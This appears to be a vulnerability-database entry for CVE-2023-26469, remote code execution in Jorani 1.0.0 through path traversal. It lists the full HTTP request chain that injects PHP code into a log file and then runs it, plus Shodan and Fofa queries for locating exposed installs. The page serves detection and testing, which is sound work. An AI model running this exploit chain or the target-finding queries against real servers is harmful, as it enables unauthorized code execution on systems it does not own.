🔙 목록으로 돌아가기

CVE-2023-26469: Jorani 1.0.0 - Remote Code Execution

TitleJorani 1.0.0 - Remote Code Execution
Authorpussycat0x
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
RemediationUpgrade Jorani to a patched version or apply the necessary security patches.
CVSS Score9.8
EPSS Score0.93246
CVE IDCVE-2023-26469
CWE IDCWE-22
Shodan Queryhttp.favicon.hash:-2032163853
Fofa Queryicon_hash=-2032163853
Tags cve2023 cve jorani rce packetstorm vkev vuln

🔍 Vulnerability Description

Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.

🌐 HTTP Request

GET /session/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Connection: close
Accept-Encoding: gzip
POST /session/login HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
Connection: close
Content-Length: 217
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

csrf_test_jorani=QT0JYd&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_AVORESNCQOU2'])){echo md5('CVE-2023-26469');unlink(__FILE__);} ?>&CipheredValue=DummyPassword
GET /pages/view/log-2026-01-14 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Connection: close
AVORESNCQOU2: CVE-2023-26469
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-26469.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-26469.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A